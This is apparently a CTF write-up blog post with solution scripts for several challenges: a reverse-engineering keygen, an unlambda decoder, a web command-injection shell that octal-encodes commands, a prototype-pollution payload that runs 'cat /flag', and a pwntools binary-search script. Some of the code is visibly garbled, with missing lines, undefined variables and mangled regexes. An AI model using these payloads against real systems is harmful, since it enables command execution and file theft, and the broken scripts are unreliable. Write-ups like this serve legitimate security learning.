# [Re] Comeongo

name[:8] = GoM0bi13
passwd[:8] = G3tItEzF

b64Decode(X051YmNmRnE=)= _NubcfFq

abcdefghijklmnopqrstuvwxyz
mnopqrstuvwxybcdefghijklmn


name[:12] = GoM0bi13_Bin
passwd[:12] = G3tItEzForRe

name[12] a→0xD7 b→0xD8 c→0xD9 … z→0xF0 … A→0xB7
name[13] a→A9

name = GoM0bi13_BingGo@
passwd = G3tItEzForRe??0!


# [Re] unlambda

import re

arr = []
l = lambda x : (x (lambda y : lambda a: lambda b : (y (b)) (a (b))))(lambda c : lambda __: c)

I = lambda x : x(lambda _:_ + 1)(0)

subed = ""
cnt = 0
with open('var.txt', 'r') as f: # var.txt每一行对应了一个check变量的值
c = 0
while c < len(content.strip()):
if content[c] != "I":
subed += content[c]
c += 1
else:
c += 2
stack = 1
code = "I("
while stack != 0:
if content[c] == "(":
stack += 1
elif content[c] == ")":
stack -= 1
code += content[c]
c += 1
result = eval(code)
subed += f"arr[{str(result)}]"
subed = subed.replace("l(l(l(l(l))))(l(l(l(l(l))))(l(l(l(l)))(l(l(l(l(l))))(l(l(l(l)))(l(l(l(l(l))))))(l(l(l(l))))))(l(l(l(l(l))))))(l(l(l(l)))(l(l(l(l)))))","run")
print(subed)


run(arr[6])(l(l(l(l)))(l(l)))(run(arr[24])(l(l(l(l)))(l(l)))(run(arr[30])(l(l(l(l)))(l(l)))(run(arr[37])(l(l(l(l)))(l(l)))(run(arr[16])(l(l(l(l)))(l(l)))(run(arr[41])(l(l(l(l)))(l(l)))(run(arr[10])(run(arr[47])(run(arr[0])(run(arr[38])(l(l(l(l)))(l(l)))(run(arr[7])(run(arr[23])(run(arr[27])(run(arr[40])(l(l(l(l)))(l(l)))(run(arr[57])(run(arr[31])(run(arr[9])(run(arr[12])(l(l(l(l)))(l(l)))(run(arr[28])(l(l(l(l)))(l(l)))(run(arr[46])(l(l(l(l)))(l(l)))(run(arr[59])(run(arr[61])(l(l(l(l)))(l(l)))(run(arr[22])(l(l(l(l)))(l(l)))(run(arr[35])(l(l(l(l)))(l(l)))(run(arr[56])(l(l(l(l)))(l(l)))(run(arr[39])(run(arr[19])(l(l(l(l)))(l(l)))(run(arr[3])(l(l(l(l)))(l(l)))(run(arr[51])(run(arr[63])(run(arr[60])(run(arr[52])(run(arr[29])(l(l(l(l)))(l(l)))(run(arr[62])(l(l(l(l)))(l(l)))(run(arr[13])(l(l(l(l)))(l(l)))(run(arr[34])(run(arr[1])(run(arr[50])(l(l(l(l)))(l(l)))(run(arr[21])(run(arr[11])(run(arr[25])(l(l(l(l)))(l(l)))(run(arr[42])(l(l(l(l)))(l(l)))(run(arr[32])(l(l(l(l)))(l(l)))(run(arr[14])(run(arr[8])(run(arr[58])(l(l(l(l)))(l(l)))(run(arr[5])(run(arr[53])(run(arr[17])(l(l(l(l)))(l(l)))(run(arr[18])(l(l(l(l)))(l(l)))(run(arr[33])(run(arr[15])(run(arr[2])(l(l(l(l)))(l(l)))(run(arr[55])(run(arr[45])(run(arr[26])(l(l(l(l)))(l(l)))(run(arr[4])(run(arr[36])(l(l(l(l)))(l(l)))(run(arr[49])(run(arr[54])(l(l(l(l)))(l(l)))(run(arr[20])(l(l(l(l)))(l(l)))(run(arr[44])(l(l(l(l)))(l(l)))(run(arr[43])(l(l(l(l)))(l(l)))(run(arr[48])(l(l(l(l))))(l(l(l(l)))(l(l))))))))(l(l(l(l)))(l(l)))))(l(l(l(l)))(l(l)))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l))))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l))))))(l(l(l(l)))(l(l))))))))(l(l(l(l)))(l(l)))))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))))))

l(l(l(l)))和F作用是一样的, l(l(l(l)))(l(l))和T的作用是一样的

exp:

import re
arr = []
l = lambda x : (x (lambda y : lambda a: lambda b : (y (b)) (a (b))))(lambda c : lambda __: c)
I = lambda x : x(lambda _:_ + 1)(0)
subed = ""
with open('var.txt', 'r') as f: # var.txt每一行对应了一个check变量的值
for line in lines:
content = line.strip()
c = 0
while c < len(content.strip()):
if content[c] != "I":
subed += content[c]
c += 1
else:
c += 2
stack = 1
code = "I("
while stack != 0:
if content[c] == "(":
stack += 1
elif content[c] == ")":
stack -= 1
code += content[c]
c += 1
result = eval(code)
subed += f"arr[{str(result)}]"
subed = subed.replace("l(l(l(l(l))))(l(l(l(l(l))))(l(l(l(l)))(l(l(l(l(l))))(l(l(l(l)))(l(l(l(l(l))))))(l(l(l(l))))))(l(l(l(l(l))))))(l(l(l(l)))(l(l(l(l)))))","run")
subed += "))))))" # 怕括号不匹配, 多加几个在后面

subArr = [0]*64

while "run" in subed:
if len(re.findall(r"run$$arr$([0-9]*)$$$$$l\(l\(l\(l$$\)\)\)$$l\(l\(l\(l$$\)\)$$l\(l$$\)\)", subed)) > 0:
index = int(re.findall(r"run$$arr$([0-9]*)$$$$$l\(l\(l\(l$$\)\)\)$$l\(l\(l\(l$$\)\)$$l\(l$$\)\)", subed)[0])
subed = subed.replace(f"run(arr[{index}])(l(l(l(l))))(l(l(l(l)))(l(l)))", f"l(l(l(l)))")
subArr[index] = 0
else:
index = int(re.findall(r"run$$arr$([0-9]*)$$$$$l\(l\(l\(l$$\)\)$$l\(l$$\)\)$$l\(l\(l\(l$$\)\)\)", subed)[0])
subed = subed.replace(f"run(arr[{index}])(l(l(l(l)))(l(l)))(l(l(l(l))))", f"l(l(l(l)))")
subArr[index] = 1
arr.extend(subArr)

flag = ""
for i in range(0, len(arr), 8):
c = arr[i+7] << 7 | arr[i+6] << 6 | arr[i+5] << 5 | arr[i+4] << 4 | arr[i+3] << 3 | arr[i+2] << 2 | arr[i+1] << 1 | arr[i]
flag += chr(c)
print(flag)


# [Web] 没有人比我更懂py

shell.py

import requests
import re

res = ""
if c.isalpha():
res += "\\"+oct(ord(c))[2:]
else:
res += c
return res

while True:
cmd = str(input())
url = "http://172.51.227.173/"
x = requests.post(url=url, data=data)

res = re.findall(r'        <p>(.*)</p>', x.text,re.S)[0]
print(res)


# [Web] WHOYOUARE

if (typeof cmd !== 'string' || cmd.length > 4 ||RegExp(/^[^a-zA-Z0-9-]+\$/).test(command[i])) {
return false;
}


exp.py

import json, requests

command = {
'constructor': {
'prototype': {
'2': 'cat /flag'
}
},
'command': ['-c', '-c']
}

cmd = {"user": json.dumps(command)}
res = requests.post(url=url, json=cmd)
res = res.json()
print(res)


# [Misc] babyMisc

from pwn import *

def main():
r = remote('172.51.227.55', 9999)

min = 0
max = 999999
r.recvline()
r.sendline(b"Y")
r.recvline()
r.recvline()
while True:
r.sendline(str(int((min+max)/2)))
x = str(r.recvline())
if "low" in x:
min = int((min+max)/2)
elif "up" in x:
max = int((min+max)/2)
else:
print(int((min+max)/2))
break
print(f"{min} {max} {x}")
return r, x

x = "lost"
while "lost" in x:
r, x = main()

r.interactive()

posted @ 2022-11-06 16:21  Tim厉  阅读(368)  评论(0编辑  收藏  举报